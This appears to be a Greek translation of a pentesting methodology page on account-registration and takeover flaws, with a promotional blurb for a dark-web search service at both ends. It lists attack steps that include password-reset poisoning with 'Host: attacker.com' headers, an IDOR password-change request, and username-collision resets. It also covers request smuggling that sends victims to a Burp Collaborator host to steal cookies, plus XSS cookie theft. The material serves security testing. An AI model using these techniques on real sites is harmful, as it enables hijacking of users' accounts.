Registration & Takeover Vulnerabilities
WhiteIntel είναι μια μηχανή αναζήτησης που τροφοδοτείται από το dark web και προσφέρει δωρεάν λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν διαρρεύσει λόγω κλοπής πληροφοριών από κλέφτες κακόβουλου λογισμικού.
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση της κατάληψης λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό κλοπής πληροφοριών.
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
Κατάληψη Εγγραφής
Διπλή Εγγραφή
Δοκιμάστε να δημιουργήσετε χρησιμοποιώντας έναν υπάρχοντα όνομα χρήστη
Ελέγξτε ποικίλες μορφές του email:
κεφαλαία γράμματα
+1@
προσθέστε κάποιο τελεία στο email
ειδικοί χαρακτήρες στο όνομα του email (%00, %09, %20)
Βάλτε μαύρους χαρακτήρες μετά το email:
test@test.com a
victim@gmail.com@attacker.com
victim@attacker.com@gmail.com
Απαρίθμηση Ονομάτων Χρηστών
Ελέγξτε αν μπορείτε να καταλάβετε πότε ένα όνομα χρήστη έχει ήδη καταχωρηθεί μέσα στην εφαρμογή.
Πολιτική Κωδικού Πρόσβασης
Δημιουργώντας έναν χρήστη ελέγξτε την πολιτική κωδικού πρόσβασης (ελέγξτε αν μπορείτε να χρησιμοποιήσετε αδύναμους κωδικούς πρόσβασης). Σε αυτήν την περίπτωση μπορείτε να δοκιμάσετε να κάνετε βίαιη εισβολή στα διαπιστευτήρια.
Εισβολή SQL
Ελέγξτε αυτήν τη σελίδα για να μάθετε πώς να προσπαθήσετε να καταλάβετε λογαριασμούς ή να εξάγετε πληροφορίες μέσω Εισβολών SQL σε φόρμες εγγραφής.
Καταλήψεις Oauth
pageOAuth to Account takeoverΕυπάθειες SAML
pageSAML AttacksΑλλαγή Email
Όταν είστε εγγεγραμμένοι δοκιμάστε να αλλάξετε το email και ελέγξτε αν αυτή η αλλαγή ελέγχεται σωστά ή μπορείτε να το αλλάξετε σε τυχαία emails.
Περισσότεροι Έλεγχοι
Ελέγξτε αν μπορείτε να χρησιμοποιήσετε προσωρινά emails
Μακρύ κωδικός πρόσβασης (>200) οδηγεί σε DoS
Ελέγξτε τα όρια ρυθμίσεων στη δημιουργία λογαριασμών
Χρησιμοποιήστε username@burp_collab.net και αναλύστε το callback
Κατάληψη Επαναφοράς Κωδικού
Διαρροή Διακριτικού Επαναφοράς Κωδικού Μέσω Referrer
Ζητήστε επαναφορά κωδικού πρόσβασης στη διεύθυνση email σας
Κάντε κλικ στον σύνδεσμο επαναφοράς κωδικού
Μην αλλάξετε τον κωδικό
Κάντε κλικ σε οποιονδήποτε ιστότοπο τρίτων (π.χ.: Facebook, twitter)
Επικοινωνήστε με το αίτημα στον διακομιστή Burp Suite proxy
Ελέγξτε αν ο κεφαλίδα αναφοράς (referer) διαρρέει το διακριτικό επαναφοράς κωδικού.
Δηλητηρίαση Επαναφοράς Κωδικού
Επικοινωνήστε με το αίτημα επαναφοράς κωδικού στο Burp Suite
Προσθέστε ή επεξεργαστείτε τις παρακάτω κεφαλίδες στο Burp Suite:
Host: attacker.com
,X-Forwarded-Host: attacker.com
Προωθήστε το αίτημα με την τροποποιημένη κεφαλίδα
http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com
Αναζητήστε μια διεύθυνση URL επαναφοράς κωδικού βασισμένη στην κεφαλίδα host όπως:
https://attacker.com/reset-password.php?token=TOKEN
Επαναφορά Κωδικού Μέσω Παραμέτρου Email
IDOR στις Παραμέτρους του API
Ο Επιτιθέμενος πρέπει να συνδεθεί με τον λογαριασμό του και να μεταβεί στο χαρακτηριστικό Αλλαγή κωδικού πρόσβασης.
Ξεκινήστε το Burp Suite και Εγκαταλείψτε το αίτημα
Στείλτε το στο καρτέλα repeater και επεξεργαστείτε τις παραμέτρους: Αναγνωριστικό Χρήστη/ηλεκτρονικό ταχυδρομείο
powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})
Αδύναμο Διακριτικό Επαναφοράς Κωδικού Πρόσβασης
Το διακριτικό επαναφοράς κωδικού πρόσβασης πρέπει να δημιουργείται τυχαία και να είναι μοναδικό κάθε φορά. Προσπαθήστε να καθορίσετε εάν το διακριτικό λήγει ή αν είναι πάντα το ίδιο, σε ορισμένες περιπτώσεις ο αλγόριθμος δημιουργίας είναι αδύναμος και μπορεί να μαντευτεί. Οι παρακάτω μεταβλητές μπορεί να χρησιμοποιούνται από τον αλγόριθμο.
Χρονική σήμανση
Αναγνωριστικό Χρήστη
Ηλεκτρονικό ταχυδρομείο του Χρήστη
Όνομα και Επώνυμο
Ημερομηνία Γέννησης
Κρυπτογραφία
Μόνο αριθμοί
Μικρή ακολουθία διακριτικού (χαρακτήρες μεταξύ [Α-Ζ,α-ζ,0-9])
Επαναχρησιμοποίηση Διακριτικού
Ημερομηνία λήξης Διακριτικού
Διαρροή Διακριτικού Επαναφοράς Κωδικού Πρόσβασης
Ενεργοποιήστε ένα αίτημα επαναφοράς κωδικού χρησιμοποιώντας το API/UI για ένα συγκεκριμένο ηλεκτρονικό ταχυδρομείο π.χ: test@mail.com
Επιθεωρήστε την απάντηση του διακομιστή και ελέγξτε το
resetToken
Στη συνέχεια χρησιμοποιήστε το διακριτικό σε ένα URL όπως
https://example.com/v3/user/password/reset?resetToken=[ΤΟ_ΔΙΑΚΡΙΤΙΚΟ_ΕΠΑΝΑΦΟΡΑΣ]&email=[ΤΟ_ΗΛΕΚΤΡΟΝΙΚΟ_ΤΑΧΥΔΡΟΜΕΙΟ]
Επαναφορά Κωδικού Πρόσβασης Μέσω Σύγκρουσης Ονόματος Χρήστη
Εγγραφείτε στο σύστημα με ένα όνομα χρήστη που είναι ταυτόσημο με το όνομα χρήστη του θύματος, αλλά με κενά που έχουν εισαχθεί πριν και/ή μετά από το όνομα χρήστη. π.χ:
"admin "
Ζητήστε επαναφορά κωδικού με το κακόβουλο όνομα χρήστη.
Χρησιμοποιήστε το διακριτικό που στάλθηκε στο ηλεκτρονικό σας ταχυδρομείο και επαναφέρετε τον κωδικό του θύματος.
Συνδεθείτε στον λογαριασμό του θύματος με τον νέο κωδικό.
Η πλατφόρμα CTFd ήταν ευάλωτη σε αυτήν την επίθεση. Δείτε: CVE-2020-7245
Κατάληψη Λογαριασμού Μέσω Cross Site Scripting
Βρείτε ένα XSS μέσα στην εφαρμογή ή ένα υποτομέα αν τα cookies είναι περιορισμένα στο γονικό domain:
*.domain.com
Διαρρεύστε το τρέχον cookie συνεδρίας
Ταυτοποιηθείτε ως ο χρήστης χρησιμοποιώντας το cookie
Κατάληψη Λογαριασμού Μέσω HTTP Request Smuggling
Χρησιμοποιήστε το smuggler για να ανιχνεύσετε τον τύπο του HTTP Request Smuggling (CL, TE, CL.TE)
powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h
\Δημιουργήστε ένα αίτημα που θα αντικαταστήσει το
POST / HTTP/1.1
με τα ακόλουθα δεδομένα:GET http://something.burpcollaborator.net HTTP/1.1 X:
με στόχο την ανοικτή ανακατεύθυνση των θυμάτων στο burpcollab και την κλοπή των cookies τους\Το τελικό αίτημα μπορεί να μοιάζει με το ακόλουθο
Παραβιάζοντας τον Λογαριασμό μέσω CSRF
Δημιουργήστε ένα payload για το CSRF, π.χ: "Φόρμα HTML με αυτόματη υποβολή για αλλαγή κωδικού πρόσβασης"
Αποστείλετε το payload
Παραβίαση Λογαριασμού μέσω JWT
Το JSON Web Token μπορεί να χρησιμοποιηθεί για την ταυτοποίηση ενός χρήστη.
Επεξεργαστείτε το JWT με άλλο User ID / Email
Ελέγξτε για αδύναμη υπογραφή JWT
Αναφορές
WhiteIntel είναι μια μηχανή αναζήτησης που τροφοδοτείται από το dark web και προσφέρει δωρεάν λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν διαρρεύσει από κλέφτες κακόβουλων λογισμικών.
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των παραβιάσεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
Last updated